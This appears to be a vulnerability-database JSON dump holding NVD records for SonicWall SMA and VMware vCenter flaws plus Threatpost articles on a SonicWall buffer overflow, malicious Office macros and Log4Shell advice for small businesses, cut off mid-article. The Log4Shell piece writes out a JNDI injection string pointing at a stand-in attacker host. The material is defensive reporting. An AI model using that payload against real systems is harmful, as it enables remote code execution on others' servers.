"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20039"], "modified": "2022-04-01T15:27:00", "cpe": ["cpe:/o:sonicwall:sma_210_firmware:9.0.0.11-31sv", "cpe:/o:sonicwall:sma_410_firmware:10.2.1.1-19sv", "cpe:/o:sonicwall:sma_400_firmware:10.2.1.1-19sv", "cpe:/o:sonicwall:sma_500v_firmware:10.2.1.1-19sv", "cpe:/o:sonicwall:sma_400_firmware:10.2.0.8-37sv", "cpe:/o:sonicwall:sma_210_firmware:10.2.1.1-19sv", "cpe:/o:sonicwall:sma_410_firmware:9.0.0.11-31sv", "cpe:/o:sonicwall:sma_400_firmware:9.0.0.11-31sv", "cpe:/o:sonicwall:sma_500v_firmware:9.0.0.11-31sv", "cpe:/o:sonicwall:sma_410_firmware:10.2.0.8-37sv", "cpe:/o:sonicwall:sma_500v_firmware:10.2.0.8-37sv", "cpe:/o:sonicwall:sma_200_firmware:10.2.1.1-19sv", "cpe:/o:sonicwall:sma_200_firmware:10.2.0.8-37sv", "cpe:/o:sonicwall:sma_210_firmware:10.2.0.8-37sv", "cpe:/o:sonicwall:sma_200_firmware:9.0.0.11-31sv"], "id": "CVE-2021-20039", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20039", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:sonicwall:sma_200_firmware:9.0.0.11-31sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_400_firmware:10.2.1.1-19sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_410_firmware:10.2.0.8-37sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_410_firmware:9.0.0.11-31sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_500v_firmware:10.2.1.1-19sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_410_firmware:10.2.1.1-19sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_400_firmware:9.0.0.11-31sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_500v_firmware:10.2.0.8-37sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_210_firmware:10.2.0.8-37sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_500v_firmware:9.0.0.11-31sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_210_firmware:10.2.1.1-19sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_400_firmware:10.2.0.8-37sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_200_firmware:10.2.0.8-37sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_200_firmware:10.2.1.1-19sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_210_firmware:9.0.0.11-31sv:*:*:*:*:*:*:*"]}, {"lastseen": "2022-05-13T16:39:27", "description": "A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-08T10:15:00", "type": "cve", "title": "CVE-2021-20038", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20038"], "modified": "2022-05-13T14:54:00", "cpe": ["cpe:/o:sonicwall:sma_500v_firmware:10.2.1.2-24sv", "cpe:/o:sonicwall:sma_400_firmware:10.2.0.8-37sv", "cpe:/o:sonicwall:sma_400_firmware:10.2.1.2-24sv", "cpe:/o:sonicwall:sma_200_firmware:10.2.0.8-37sv", "cpe:/o:sonicwall:sma_500v_firmware:10.2.1.1-19sv", "cpe:/o:sonicwall:sma_210_firmware:10.2.1.1-19sv", "cpe:/o:sonicwall:sma_400_firmware:10.2.1.1-19sv", "cpe:/o:sonicwall:sma_210_firmware:10.2.0.8-37sv", "cpe:/o:sonicwall:sma_210_firmware:10.2.1.2-24sv", "cpe:/o:sonicwall:sma_410_firmware:10.2.1.2-24sv", "cpe:/o:sonicwall:sma_500v_firmware:10.2.0.8-37sv", "cpe:/o:sonicwall:sma_200_firmware:10.2.1.2-24sv", "cpe:/o:sonicwall:sma_200_firmware:10.2.1.1-19sv", "cpe:/o:sonicwall:sma_410_firmware:10.2.0.8-37sv", "cpe:/o:sonicwall:sma_410_firmware:10.2.1.1-19sv"], "id": "CVE-2021-20038", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20038", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:sonicwall:sma_400_firmware:10.2.1.2-24sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_200_firmware:10.2.1.1-19sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_210_firmware:10.2.1.1-19sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_210_firmware:10.2.0.8-37sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_500v_firmware:10.2.1.1-19sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_410_firmware:10.2.1.1-19sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_200_firmware:10.2.1.2-24sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_200_firmware:10.2.0.8-37sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_400_firmware:10.2.0.8-37sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_400_firmware:10.2.1.1-19sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_500v_firmware:10.2.1.2-24sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_410_firmware:10.2.0.8-37sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_500v_firmware:10.2.0.8-37sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_410_firmware:10.2.1.2-24sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_210_firmware:10.2.1.2-24sv:*:*:*:*:*:*:*"]}, {"lastseen": "2022-07-13T16:20:19", "description": "Under certain conditions, vmdir that ships with VMware vCenter Server, as part of an embedded or external Platform Services Controller (PSC), does not correctly implement access controls.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-10T14:15:00", "type": "cve", "title": "CVE-2020-3952", "cwe": ["CWE-306"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3952"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:vmware:vcenter_server:6.7"], "id": "CVE-2020-3952", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-3952", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vmware:vcenter_server:6.7:-:*:*:*:*:*:*"]}], "threatpost": [{"lastseen": "2022-01-12T01:28:02", "description": "Rapid7 has offered up more details on a SonicWall critical flaw that allows for unauthenticated remote code execution (RCE) on affected devices, noting that it arises from tweaks that the vendor made to the Apache httpd server.\n\nThe bug ([CVE-2021-20038](<https://cwe.mitre.org/data/definitions/121.html>)) is one of five vulnerabilities discovered in its series of popular network access control (NAC) system products.\n\nIn October, Rapid7 lead security researcher Jake Baines [discovered the flaws](<https://threatpost.com/critical-sonicwall-vpn-bugs-appliance-takeover/176869/>) in Sonic Wall\u2019s Secure Mobile Access (SMA) 100 series of devices, which includes SMA 200, 210, 400, 410 and 500v, he wrote in a report published Tuesday.\n\nSonic Wall\u2019s SMA 100 line provides end-to-end secure remote access to corporate resources, whether they are hosted on-premise, in the cloud or in hybrid data centers. The suite also offers policy-enforced access control for corporate users to applications after establishing user and device identity and trust.\n\nCVE-2021-20038 is the most critical of the flaws, with a rating of 9.8 on the Common Vulnerability Scoring System (CVSS). It\u2019s a stack buffer overflow vulnerability that an attacker can exploit to gain complete control of a device or virtual machine that\u2019s running SonicWall\u2019s NAC solution.\n\nThe flaw allows attackers to overwrite several security-critical data on an execution stack that can lead to arbitrary code execution, according to its advisory [listing](<https://cwe.mitre.org/data/definitions/121.html>) on the Common Weakness Enumeration website.\n\n\u201cThe most prominent is the stored return address, the memory address at which execution should continue once the current function is finished executing,\u201d according to the advisory. \u201cThe attacker can overwrite this value with some memory address to which the attacker also has write access, into which they place arbitrary code to be run with the full privileges of the vulnerable program.\u201d\n\n## **Exploiting the Critical Vulnerability **\n\nThe stack-based buffer overflow flaw discovered by Baines affects SonicWall SMA 100 series version: 10.2.1.1-19sv and is by far is the most dangerous for affected devices, and thus the most advantageous for attackers, he wrote.\n\nBy exploiting the issue, attackers \u201ccan get complete control of the device or virtual machine\u201d that\u2019s running the appliance, according to the report.\n\n\u201cThis can allow attackers to install malware to intercept authentication material from authorized users, or reach back into the networks protected by these devices for further attack,\u201d Baines wrote.\n\nThis week, Baines revealed that the problem in the device lies in its web server, which is \u201ca slightly modified version of the Apache httpd server,\u201d he explained in the report, shared with Threatpost ahead of publication.\n\nOne of the notable modifications is in the mod_cgi module (/lib/mod_cgi.so) and, specifically, a custom version of the cgi_build_command function that appends all the environment variables onto a single stack-based buffer using strcat, Baines wrote.\n\n\u201cThere is no bounds checking on this environment string buildup, so if a malicious attacker were to generate an overly long QUERY_STRING then they can overflow the stack-based buffer,\u201d he explained. This results in a crash that compromises the device, Baines wrote.\n\n\u201cTechnically, the \u2026 crash is due to an invalid read, but you can see the stack has been \nsuccessfully overwritten,\u201d he wrote. \u201cA functional exploit should be able to return to an attacker\u2019s desired address.\u201d\n\nSince edge-based NAC devices \u201care especially attractive targets for attackers,\u201d Baines said it\u2019s essential that companies with networks that use SonicWall\u2019s SMA 100 series devices in whatever form apply SonicWall\u2019s update as quickly as possible to fix the issues, Baines said.\n\n## **Reported & Fixed: Patch Now**\n\nThe other flaws discovered by Barnes were rated with CVSS severity in the range of 6.5 to 7.5. They include an \u201cimproper neutralization of special elements used in an OS command,\u201d or OS command injection flaw with a rating of 7.2 (CVE-2021-20039); a relative path traversal vulnerability with a rating of 6.5 (CVE-2021-20040); a loop with unreachable exit condition, or infinite loop flaw with a rating of 7.5 (CVE-2021-20041); and an unintended proxy or intermediary also known as a \u201cconfused deputy\u201d vulnerability with a rating of 6.5 (CVE-2021-20042).\n\nIn his research, Baines tested the SMA 500v firmware versions 9.0.0.11-31sv and 10.2.1.1-19sv finding that CVE-2021-20038 and CVE-2021-20040 affect only devices running version 10.2.x, while the remaining issues affect both firmware versions.\n\nBaines reported the flaws to SonicWall and worked with the vendor to remediate the vulnerabilities over a period of about two months. On Dec. 7, SonicWall [released a security advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>) and updates fixing the problems Baines had identified.\n\nHis report details each flaw and its impact and was published according to Rapid7\u2019s [vulnerability disclosure policy](<https://www.rapid7.com/security/disclosure/>).\n\n**_Password_**_ _**_Reset: [On-Demand Event](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>):_**_ Fortify 2022 with a password-security strategy built for today\u2019s threats. This [Threatpost Security Roundtable](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>), built for infosec professionals, centers on enterprise credential management, the new password basics and mitigating post-credential breaches. Join Darren James, with Specops Software and Roger Grimes, defense evangelist at KnowBe4 and Threatpost host Becky Bracken. _**_[Register & stream this FREE session today](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>)_**_ \u2013 sponsored by Specops Software._\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-01-11T14:09:21", "type": "threatpost", "title": "Critical SonicWall NAC Vulnerability Stems from Apache Mods", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20038", "CVE-2021-20039", "CVE-2021-20040", "CVE-2021-20041", "CVE-2021-20042"], "modified": "2022-01-11T14:09:21", "id": "THREATPOST:2A215C54591860EE16762D5DD82C504D", "href": "https://threatpost.com/sonicwall-nac-vulnerability-apache-mods/177529/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:09:28", "description": "Any cybersecurity attack \u2014 whether it be a breach, an incident or any form of compromise \u2014 starts with hackers getting in through the door. Threat actors and adversaries rely on gaining code execution on a target system which they can then leverage to do more damage\u2014a phase commonly referred to as initial access.\n\nMore often than not, the easiest way for an attacker to gain initial access is by exploiting the human vulnerability. This involves tricking an end user into taking some action that ultimately gives the threat actor more power than they had before. They lay a trap and propose a cleverly disguised lie to as many potential victims as possible. Even though a threat actor may attempt to fool a thousand users at one time, they only need _one_ to fall for the charade.\n\nThreat actors design and deliver this scheme [typically through email](<https://www.huntress.com/blog/experts-weigh-in-on-the-state-of-email-based-threats>)\u2014the easiest way to put digital content in front of any individual. In today\u2019s world, this is common language: \u201cBe careful not to fall for phishing emails.\u201d \n\nFor decades, the security industry has attempted to train users to stay vigilant against phishing emails with the boilerplate basics you have heard time and time again: \u201cLook for bad grammar or spelling mistakes,\u201d \u201cdouble-check the sending address,\u201d \u201chover over the link,\u201d etc. While these saturated lessons might help ward off the low-hanging fruit, well-crafted phishing emails from sophisticated actors may be genuinely hard to spot.\n\n## **Bait on the Lure**\n\nPhishing emails or any sort of digital deception carry similar traits, but might have different desired outcomes. The most [successful phishing campaigns](<https://twitter.com/HuntressLabs/status/1453077534589992961>) do three things: \n\n * Set the stage with a pretense\n * Strike fear with a threat\n * Demand action through urgency\n\nPretense typically tugs at a person\u2019s heartstrings or capitalizes on real-world threats or current events, such as the COVID-19 pandemic, taxes or elections, cryptocurrencies, or even blackmail and extortion (\u201cI have your password/I have you on webcam\u201d threats).\n\nThe overall goal of a phish, however, varies.\n\n## **Credential Harvesting**\n\nThe adversary may set up a \u201clookalike\u201d website, masquerading as a page that the user expected and intended to go to, but which instead delivers username and password combos to the threat actor when victims attempt to log in.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10090603/IMG_2752.jpg>)\n\nSource: Huntress.\n\n## **Session Hijacking**\n\nThe adversary also may implant code on a staged website or HTML file, forcing the user\u2019s browser to download a file or leave behind cookies that can be used for later actions performed by the threat actor:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10090608/IMG_2753.jpg>)\n\nSource: Huntress.\n\n## **Malicious File Attachments**\n\nThe adversary most often however attaches a specific file to an email, suggesting that the user download it and open it on their own volition. This file often masquerades as a legitimate document, but will instead execute code upon being opened.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10090613/IMG_2754.jpg>)\n\nSource: Huntress.\n\nLet\u2019s turn our focus to this file-attachment attack vector\u2014specifically, malicious Microsoft Office documents, which can run code with a macro.\n\n## **Macro Malware**\n\nOne extremely common file attachment type included in phishing emails are Microsoft Office documents (like Word, PowerPoint or Excel)\u2014masquerading as innocent files that any user or employee might open on a daily basis. \n\nConsider an HR representative or a hiring manager at any company. Their legitimate job function is to receive and handle applications from interested applicants, oftentimes opening incoming emails and downloading their attachments, perhaps to view an incoming prospect\u2019s resume. \n\nMalicious Office documents, or maldocs, can execute code via macros if they are given explicit user permission. Once opened, the adversary must continue the charade and trick the user to click \u201cEnable Editing\u201d or \u201cEnable Content\u201d for a macro to run.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10091814/unnamed.jpeg>)\n\nSource: Huntress.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10090618/IMG_2755.jpg>)\n\nMacro code will execute upon clicking the \u201cEnable Content\u201d via a specific function handler:\n\nSub Document_Open() \nSubstitutePage \nEnd Sub \nSub AutoOpen() \nSubstitutePage \nEnd Sub \nSub SubstitutePage() \nActiveDocument.Content.Select \nSelection.Delete \nActiveDocument.AttachedTemplate.AutoTextEntries(\u201cCandidate\u201d).Insert Where:=Selection.Range, RichText=True \nEnd Sub\n\nThe AutoOpen() or Document_Open() subroutines define the code that will run immediately once the Office document is opened or the user enables content. In the snippet of code above, the process to emulate \u201cdecrypting\u201d the content is shown\u2014simply switching out the original document with content that is saved in an attached template, taking advantage of another feature of Microsoft Word to hide things from the user.\n\n## **Tools of the Trade: Analysis Tactics**\n\nThere are several tools available to help threat hunters inside companies identify macros and catch them before they detonate. Here are two.\n\n### **Olevba**\n\nThis tool tends to be run on Linux as it is a Python tool. It does a nice job of finding key indicators that might set off an alarm for a threat hunter. It generates an output that gives threat researchers a chunk of macro code to see if any of that code warrants additional attention.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10090629/IMG_2757.jpeg>)\n\nSource: Huntress.\n\n### **ViperMonkey**\n\nThis tool takes a different approach than Olevba. Whereas Olevba decodes back-end VBAproject.bin files in .ZIP files and generates the source code, ViperMonkey emulates VisualBasic (VB) scripts to a certain extent. It can run VB shellcode and see what it does\u2014all without posing any real harm to users. It can even bypass evasive techniques threat actors take when it comes to malicious Office documents, such as splitting up the code throughout the document to make it harder to identify. ViperMonkey can find those pieces of code and piece them together to be analyzed.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10090634/IMG_2758.jpeg>)\n\nSource: Huntress.\n\n## **The Perpetual Cyber Battle**\n\nHiding malware within Office documents is not a new trick\u2014it\u2019s just a very successful one. Despite knowing the scams and noticing the red flags, we\u2019re seeing a trend of more targeted and methodical phishing campaigns. And this might leave many defenders feeling like they\u2019re playing a game of whack-a-mole and reacting to the new tricks and tactics that attackers are using. But as attackers have gotten better at social engineering and finding ways to dupe users and their technology, we like to think that us defenders are certainly [rising to the challenge](<https://threatpost.com/tools-defending-phishing-attacks/176463/>) and better prepared for battle.\n\n**_John Hammond is a senior security researcher at [Huntress.](<https://www.huntress.com/>)_**\n\n**_Enjoy additional insights from Threatpost\u2019s Infosec Insiders community by visiting our [microsite](<https://threatpost.com/microsite/infosec-insiders-community/>). _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T19:29:27", "type": "threatpost", "title": "Next-Gen Maldocs & How to Solve the Human Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T19:29:27", "id": "THREATPOST:B318814572E066732E6C32CC147D95E2", "href": "https://threatpost.com/maldocs-malicious-office-documents-human-vulnerability/176916/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T20:32:17", "description": "News of the Log4Shell vulnerability is everywhere, with security experts variously calling the Apache log4j logging library bug a recipe for an \u201cinternet meltdown,\u201d as well as the \u201cworst cybersecurity bug of the year.\u201d Names like \u201cApple,\u201d \u201cTwitter\u201d and \u201cCloudflare\u201d are being bandied about as being vulnerable, but what does the issue mean for small- and medium-sized businesses?\n\nWe asked security experts to weigh in on the specific effects (and advice/remedies) for SMBs in a set of roundtable questions, aimed at demystifying the firehose of information around the headline-grabbing issue.\n\nIt may seem overwhelming for smaller companies. But our experts, from Anchore, Cybereason, Datto, ESET, HackerOne, Invicti Security, Lacework and Mitiga, have weighed in here with exclusive, practical advice and explanations specifically for SMBs dealing with Log4Shell.\n\n_\u201cWiz research shows that more than 89 percent of all environments have vulnerable log4j libraries. And in many of them, the dev teams are sure they have zero exposure \u2014 and are surprised to find out that some third-party component is actually built using Java.\u201d \u2014 Ami Luttwak, __co-founder and CTO at Wiz, which has seen its usage double as a result of Log4Shell (via email to Threatpo__st)._\n\n_**Questions answered (click to jump to the appropriate section):**_\n\n * What bad Log4Shell outcomes are possible for SMBs?\n * How is a real-world Log4Shell attack carried out?\n * How can SMBs prepare for Log4Shell without a dedicated security team?\n * What happens if an SMB uses an MSP?\n * What applications should SMBs worry about being attacked?\n * How can SMBs remediate a Log4Shell attack?\n * Final thoughts\n\n## Background on Log4Shell\n\nLog4Shell ([CVE-2021-44228](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>)) affects applications that rely on the log4j library to log data. Because that library is almost ubiquitous in Java applications, virtually any business that has a website is highly likely to be affected. With one line of malicious code, attackers are able to execute malware or commands on a target application and take over the server that houses it.\n\nFrom there, an attacker can carry out any number of further attacks.\n\n\u201cSmall businesses are at significant risk because plenty of the software they rely on may be vulnerable, and they do not have the resources to patch quickly enough,\u201d Ofer Maor, Mitiga CTO, told Threatpost.\n\nSMBs also tend to rely on third-party software suppliers and managed service providers (MSPs) for their technology infrastructure, which reduces cost and reduces the need for dedicated IT staff. However, this unfortunately puts SMBs at even worse risk, because they need to rely on their third-party vendors to patch and respond in many cases.\n\nThe bug was first disclosed as a zero-day vulnerability last week, but an emergency fix has been rolled out that now must be incorporated by the many developers who use log4j in their applications. The steps to address Log4Shell for SMBs thus include identifying potentially affected applications (including those provided by MSPs), confirming the vulnerability\u2019s impact within them, and applying or confirming updates as soon as possible. SMBs will also need to determine whether they\u2019re already compromised and remediate the issue if so.\n\nAll of this should take priority since [a slew of attacks is imminent](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>), thanks to an exploit becoming publicly available online, researchers noted.\n\n\u201cNumerous attack groups are already [actively exploiting](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) this vulnerability, mostly through automated scripts,\u201d Maor warned. \u201cThis means we expect to see this being exploited in masses, hitting tens of thousands or even more targets.\u201d\n\n## What Bad Log4Shell Outcomes Are Possible for SMBs?\n\n**Ofer Maor, Mitiga CTO:** One of the concerns is that a lot of these attacks now will focus on getting initial access only and establishing persistence (that is, installing something that will allow the attacker to have access to their systems later, even after the vulnerability has been fixed).\n\n**Marc-\u00c9tienne L\u00e9veill\u00e9, malware researcher for ESET:** SMBs providing online services may expose their system to malware and data exfiltration if their systems use the log4j software to log events. The risk is quite high, given the exploit is available online and relatively easy to trigger. Once into the network, cybercriminals could pivot to gain access to additional resources.\n\n**Josh Bressers, vice president of security at Anchore:** This vulnerability allows attackers to run the code of their choosing, such as a cryptominer, a backdoor or data-stealing malware, for example. One of the challenges for a vulnerability like this is the attacker landscape is changing rapidly. So far, most of the attacks seem to be using compute resources to mine cryptocurrency, but these attacks are changing and evolving each hour. It is expected that the attacks will gain in sophistication over the coming days and weeks.\n\n**Mark Nunnikhoven, distinguished cloud strategist at Lacework:** Unfortunately\u2026an attacker can take over your system or steal your data quite easily using this vulnerability.\n\n**Pieter Ockers, senior director of technical services at HackerOne: **In a more devastating case, criminals that gain initial access to the victim\u2019s environment could auction that access off to crews that specialize in executing ransomware attacks. SMBs should be hyper-aware of any of their software vendors/MSPs that use Apache log4j in case they are affected by a breach; I suspect we might hear of some ransomware attacks soon stemming from this vulnerability.\n\n## How Is a Real-World Log4Shell Attack Carried Out?\n\n**Cybereason CTO Yonatan Striem-Amit**: The most prevalent attack scenarios we\u2019ve seen are abusing things like the user agent or things like a log-in screen. If an application has a log-in page where a user is asked to put his username and password (and a lot of them do), an attacker could just supply the malicious string within that user field and get code execution on that server. After that he essentially controls logins, and therefore can start doing whatever he wants on that server, including, of course, eavesdropping into every other user who\u2019s logging in to the environment with their password.\n\n**Adam Goodman, vice president of product management at Invicti Security: **This attack is astonishingly easy to execute. This is because it may not require authentication to execute, nor would it require penetrating multiple application and/or networking layers to begin the exploit. It\u2019s simply a text string sent to any places that will be logged. And finding such a place is very easy \u2013 it can be a simple header, or a simple text field or error condition sent to a log file.\n\nTo exploit Log4Shell, the attacker may use any user input subsequently logged by the log4j framework. For example, in the case of a web application, it may be any text entry field or HTTP header such as User-Agent. Server logging is often set to log headers as well as form data.\n\nThe attacker only needs to include the following string in the logged user input:\n\n${jndi:ldap://attacker.com/executeme}\n\nWhere attacker.com is a server controlled by the attacker and executeme is the Java class to be executed on the victim server. And this is just one of many ways to exploit this vulnerability.\n\n**Lacework\u2019s Nunnikhoven: **\u201cA real world-attack can be as simple as the attack sending a specifically crafted web request to a vulnerable server. When the server processes that request, the attacker then has access to the server. The Lacework Labs team has documented this attack and some other technical aspects of attacks we\u2019ve seen in[ this blog post](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>).\u201d\n\n**Anchore\u2019s Bressers: **Attackers send requests to vulnerable applications, this triggers the vulnerability. The application then downloads a cryptocurrency mining application, in one scenario, and runs it on the compromised system. The cryptomining application then consumes large amounts of victim\u2019s processing power while the attacker claims the cryptomining rewards.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/14151922/log4j-e1639513188979.png>)\n\nTrend Micro published this attack-scenario flow on Tuesday (https://www.zerodayinitiative.com/blog/2021/12/14/the-december-2021-security-update-review).\n\n## How Can SMBs Address Log4Shell without a Dedicated Security Team?\n\n**HackerOne\u2019s Ockers: **These kinds of wide sweeping cyberattacks will always be a bigger challenge for those that lack a dedicated security team. If only one or two individuals in IT are working to monitor security, it\u2019s even more important you\u2019re prepared and have already taken stock of the software you\u2019re using and your vendor\u2019s software. Once you gain that visibility, I recommend patching any instances you find of log4j and updating the software to version 2.15.0 in your own software. I\u2019d also confirm any vendors\u2019 exposure and incident management around log4j patching and response.\n\n_According to __[Microsoft\u2019s recent blog](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>)__, the log4j 2 library is included in widely deployed Apache products including Struts 2, Solr, Druid, Flink and Swift. SMBs that have built 